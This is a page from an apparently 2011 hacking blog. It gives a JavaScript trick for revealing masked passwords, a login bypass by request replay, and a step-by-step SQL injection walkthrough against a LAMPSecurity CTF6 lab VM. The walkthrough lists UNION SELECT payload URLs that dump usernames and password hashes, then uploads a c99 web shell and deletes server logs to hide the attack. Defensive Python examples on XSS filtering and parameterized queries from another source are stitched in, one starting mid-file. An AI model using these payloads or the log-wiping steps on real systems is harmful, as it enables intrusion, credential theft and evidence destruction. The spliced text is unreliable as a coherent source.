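    return f'<p>Results for: {s}</p>\n<input type="text" name="q" value="{s}">'


class TagCollector(HTMLParser):
    """Collects every start tag the browser-side parser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: Set[str] = set()

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.add(tag)

    def handle_startendtag(self, tag, attrs) -> None:
        self.tags.add(tag)


def injected_tags(rendered: str) -> Set[str]:
    """Tags in the rendered page that the template itself does not contain."""
    collector = TagCollector()
    collector.feed(rendered)
    collector.close()
    return collector.tags - TEMPLATE_TAGS


def audit(q: str) -> Dict[str, Set[str]]:
    """Which foreign tags survive under each defence, for one input."""
    return {
        "none": injected_tags(render(q, lambda s: s)),
        "blacklist": injected_tags(render(q, blacklist_filter)),
        "magic_quotes": injected_tags(render(q, magic_quotes)),
        "escape": injected_tags(render(q, contextual_escape)),
    }


if __name__ == "__main__":
    for payload in PAYLOADS:
        print(payload)
        for defence, tags in audit(payload).items():
            print(f"  {defence:13s} -> {sorted(tags) or 'clean'}")
```

The blacklist stops the textbook `<script>` payload but waves the IMG tag through; magic quotes leave the fromCharCode payload untouched because it contains no quotes at all; only escaping for the output context leaves every payload inert, and it does so without knowing any of them in advance.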

For More Script Coding Of XSS Visit

Tuesday, 30 August 2011

-: Reveal *****(Asterisk) Passwords Using Javascript N00b Friendly:-


Want to Reveal the Passwords Hidden Behind Asterisk (****) ? 


Follow the steps given below- 


1) Open the Login Page of any website. (eg. http://mail.yahoo.com)  


2) Type your 'Username' and 'Password'. 


3) Copy and paste the JavaScript code given below into your browser's address bar and press  
'Enter'. 


                    javascript: alert(document.getElementById('Passwd').value);  


4) As soon as you press 'Enter', a window pops up showing the password typed by you..!


Note:- This trick may not work with Firefox.

Thursday, 25 August 2011

Login Form Bypass using Mantra Security Toolkit

Hi All,

In this tutorial we will try to bypass the login form of a vulnerable website using Mantra Security Toolkit

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6


Let's begin,

Step 1:

I'm on the home page of the website now

http://192.168.132.128/

[Image: mantrasecuritytoolkit1.jpg]


Step 2:

Login form of the website

http://192.168.132.128/?action=login

[Image: mantrasecuritytoolkit2.jpg]


Step 3:

Now we will test the input forms against SQL injection. For that we can use SQL Inject Me tool. It can be launched from Tools > SQL Inject Me > Open SQL Inject Me Sidebar

[Image: mantrasecuritytoolkit3.jpg]


Step 4:

You can see SQL Inject Me sidebar on the right

[Image: mantrasecuritytoolkit4.jpg]


Step 5:

I'm checking all the fields to test.

[Image: mantrasecuritytoolkit5.jpg]


Step 6:

I clicked on "Test all forms with all attacks"

[Image: mantrasecuritytoolkit6.jpg]


Step 7:

Test results say that none of the fields are vulnerable to SQL injection attack. So it's confirmed that the website is sanitizing the input

[Image: mantrasecuritytoolkit7.jpg]



Step 8:

Now we will try to see what type of sanitizing mechanism the website employs. For that we will use Firebug. It can be launched by going to Tools > Firebug > Open Firebug

[Image: mantrasecuritytoolkit9.jpg]



Step 9:

Now that Firebug is open, I'm enabling Inspect mode of Firebug by clicking on the inspect icon (second one) in the top left corner.

[Image: mantrasecuritytoolkit10.jpg]



Step 10:

I clicked on the login form and Firebug highlighted the respective source code. It shows that some type of local JavaScript is used to sanitize the input.

[Image: mantrasecuritytoolkit11.jpg]



Step 11:

For bypassing it, we will use Live HTTP Headers. It can be launched either from sidebar or by going to Tools > Live HTTP Headers

[Image: mantrasecuritytoolkit12.jpg]



Step 12:

Now you can see Live HTTP Headers. The Capture check box must be checked.

[Image: mantrasecuritytoolkit13.jpg]



Step 13:

I went back to the login form, entered some sample values there and pressed Log In

[Image: mantrasecuritytoolkit14.jpg]


Step 14:

Now I again went back to Live HTTP Headers. We can clearly see that it captured the session.

[Image: mantrasecuritytoolkit15.jpg]



Step 15:

I scrolled it up to find the username, password data field. I clicked on it and pressed on Replay button

[Image: mantrasecuritytoolkit16.jpg]



Step 16:

I'm changing the value a little bit to bypass the authentication and clicking on the Replay button

[Image: mantrasecuritytoolkit17.jpg]


Step 17:
hmmm. I got an error message. Looks like I should modify the injected code.

[Image: mantrasecuritytoolkit18.jpg]

Step 18:

I modified the code

[Image: mantrasecuritytoolkit19.jpg]


Step 19:

No luck

[Image: mantrasecuritytoolkit20.jpg]


Step 20:

I changed the value again and pressed on Replay button

[Image: mantrasecuritytoolkit21.jpg]


Step 21:

Voila. I'm successfully authenticated.

[Image: mantrasecuritytoolkit22.jpg]


Step 22:

Now that I have got admin access

[Image: mantrasecuritytoolkit23.jpg]

If you wish to completely root the whole server, you can go to this post and follow steps from step 24 

Wednesday, 24 August 2011

Advanced SQL Injection Tutorial - Complete website rooting

Hi All,

In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell"

Now the process


Step 1:

I'm on the home page of the website now


http://192.168.132.128/

[Image: mantrahackbar1.jpg]


Step 2:

I went through all the pages of web site and found a page with URL input


http://192.168.132.128/?id=13

[Image: mantrahackbar2.jpg]


Step 3:

I launched Hackbar by pressing F9

[Image: mantrahackbar3.jpg]


Step 4:

The power of the single quote. I'm checking whether the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.



http://192.168.132.128/?id=13'

[Image: mantrahackbar4.jpg]

Since the page content is different from the previous one, I can make sure that the web page is vulnerable.


Step 5:

Let's find out the number of tables



http://192.168.132.128/?id=13 order by 1

[Image: mantrahackbar6.jpg]


Step 6:

I have to keep on increasing the last number till I see any changes in the page. In usual practice it's gonna be a tedious task since there will be hundreds and thousands of tables, if not more. But with this tool I can simply press the + button till I see any changes on the webpage



http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar7.jpg]



Step 7:

I went up to 7 and no change till now



http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar12.jpg]



Step 8:

I'm on 8 now and I can see the page changed



http://192.168.132.128/?id=13 order by 8

[Image: mantrahackbar13.jpg]



Step 9:

Now let's go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT

[Image: mantrahackbar14.jpg]



Step 10:

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exist and there are only 7 tables

[Image: mantrahackbar16.jpg]



Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Let's take the number 2



http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7


[Image: mantrahackbar19.jpg]



Step 12:

I replaced number 2 in the URL with another SQL command; it got executed and the result is displayed on the page

http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

[Image: mantrahackbar21.jpg]

The current user is cms_user@localhost



Step 13:

Let's find out the version of the database. I replaced 2 in the URL with the version() command

http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

[Image: mantrahackbar22.jpg]

5.0.45 is the version



Step 14:

Let me list all the tables

http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

[Image: mantrahackbar23.jpg]

From this list I found "user" is an interesting table



Step 15:

Now I listed all the columns and it's a big list

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

[Image: mantrahackbar24.jpg]



Step 16:

I want columns from the table "user" and nothing else

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

[Image: mantrahackbar25.jpg]



Step 17:

Let's find the user name

http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

[Image: mantrahackbar27.jpg]



Step 18:

Now, what about the password

http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

[Image: mantrahackbar26.jpg]

It's encrypted
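Every probe from Step 4 to Step 18 works for the same reason: the value of the `id` parameter is pasted into the SQL text, so a quote breaks the statement, `order by N` tells the attacker the column count, and `UNION SELECT` appends rows from another table. As an added example that is not part of the post, the Python below runs the post's own URL payloads against three versions of the `?id=` lookup, the concatenating one the tutorial targets, a parameterized one, and one that additionally validates the parameter as an integer, and records what each returns. SQLite stands in for the post's MySQL backend so the example runs offline; tables, rows and the hash placeholder are constructed.

```python
import sqlite3
from typing import Callable, Dict, List, Tuple

Row = Tuple
Handler = Callable[[sqlite3.Connection, str], List[Row]]

SELECT = "SELECT id, title, c3, c4, c5, c6, c7 FROM event WHERE id = "


def setup_db() -> sqlite3.Connection:
    """Constructed stand-in for the tutorial's CMS database (7-column event table, user table)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE event (id INTEGER PRIMARY KEY, title TEXT, c3 TEXT, c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT);
        CREATE TABLE user  (user_id INTEGER PRIMARY KEY, user_username TEXT, user_password TEXT);
        INSERT INTO event VALUES (13, 'Summer picnic', 'a', 'b', 'c', 'd', 'e');
        INSERT INTO user  VALUES (1, 'admin', 'constructed-hash-placeholder');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> List[Row]:
    """The pattern the tutorial exploits: the raw parameter becomes part of the SQL text."""
    return conn.execute(SELECT + raw_id).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, raw_id) -> List[Row]:
    """The parameter is bound as a value; the SQL text never changes."""
    return conn.execute(SELECT + "?", (raw_id,)).fetchall()


def lookup_validated(conn: sqlite3.Connection, raw_id: str) -> List[Row]:
    """Parameterized plus input validation: anything that is not an integer is rejected outright."""
    if not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return lookup_parameterized(conn, int(raw_id))


# The post's own URL payloads (the part after ?id=).
PROBES = [
    "13",
    "13'",
    "13 order by 7",
    "13 order by 8",
    "13 UNION SELECT 1,user_username,3,4,5,6,7 from user",
]


def outcome(handler: Handler, conn: sqlite3.Connection, raw_id: str) -> str:
    """'rows=N' when the query ran, 'rejected' when the database or the validator refused it."""
    try:
        return f"rows={len(handler(conn, raw_id))}"
    except (sqlite3.Error, ValueError):
        return "rejected"


def run_probes() -> Dict[str, Tuple[str, str, str]]:
    """Outcome of every probe as (vulnerable, parameterized, validated)."""
    conn = setup_db()
    return {
        p: (
            outcome(lookup_vulnerable, conn, p),
            outcome(lookup_parameterized, conn, p),
            outcome(lookup_validated, conn, p),
        )
        for p in PROBES
    }


if __name__ == "__main__":
    for probe, (vuln, param, valid) in run_probes().items():
        print(f"{probe!r:60s} vulnerable={vuln:9s} parameterized={param:9s} validated={valid}")
```

Read the vulnerable column top to bottom and the tutorial's signals reappear: the quote produces an error page, `order by 7` renders normally while `order by 8` errors (so there are 7 columns), and the UNION returns a second row carrying the user table's contents. The parameterized handler compares the whole string against the integer column and simply finds nothing, and the validating handler refuses every probe except the plain number.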



Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into Hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

[Image: mantrahackbar30.jpg]



Step 20:

Voila.!!! I got the password

[Image: mantrahackbar31.jpg]



Step 21:

Finding the login page. It was right in front of me
[Image: mantrahackbar32.jpg]



Step 22:

Logging in with the credentials I have
[Image: mantrahackbar33.jpg]



Step 23:

Greetings.!!!

[Image: mantrahackbar35.jpg]



Step 24:

I'm an admin now. Look at my powers.

[Image: mantrahackbar36.jpg]



Step 25:

Let me add an event

[Image: mantrahackbar37.jpg]



Step 26:

and of course I want to upload a picture

[Image: mantrahackbar38.jpg]



Step 27:

Let's see whether it allows me to upload the shell or not

[Image: mantrahackbar39.jpg]



Step 28:

Now I'm pressing on "Add Event" button

[Image: mantrahackbar40.jpg]



Step 29:

Nice. Looks like it got uploaded

[Image: mantrahackbar41.jpg]



Step 30:

Let's see where the shell got uploaded to

[Image: mantrahackbar42.jpg]



Step 31:

I'm trying to get the default upload location

[Image: mantrahackbar43.jpg]

[Image: mantrahackbar44.jpg]



Step 32:

Looks like I got it

[Image: mantrahackbar45.jpg]

Let me click on the c9shell.php file I just uploaded



Step 33:

Voila. I have shell access

[Image: mantrahackbar46.jpg]



Step 34:

I simply clicked on the up button to get to the root folder

[Image: mantrahackbar48.jpg]

Now I can do whatever I wish: deface the website, maintain access or whatever. But it's out of the scope of the current tutorial



Step 35:

What I'm interested in is the log folder

[Image: mantrahackbar49.jpg]




Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks

[Image: mantrahackbar51.jpg]



Step 37:

Let me go back and edit the log file

[Image: mantrahackbar52.jpg]

[Image: mantrahackbar53.jpg]



Step 38:

I deleted all the log entries. Now saving it.

[Image: mantrahackbar54.jpg]



Step 39:

Nice. Log file is empty now

[Image: mantrahackbar56.jpg]



Step 40:

Now, let's remove the c99 shell by pressing Self Remove

[Image: mantrahackbar57.jpg]



Step 41:

Confirmed.!!!

[Image: mantrahackbar58.jpg]



Step 42:

OK. Good Bye C99

[Image: mantrahackbar59.jpg]



Step 43:

Well. It deleted itself

[Image: mantrahackbar60.jpg]



H4qqy H4ck!ng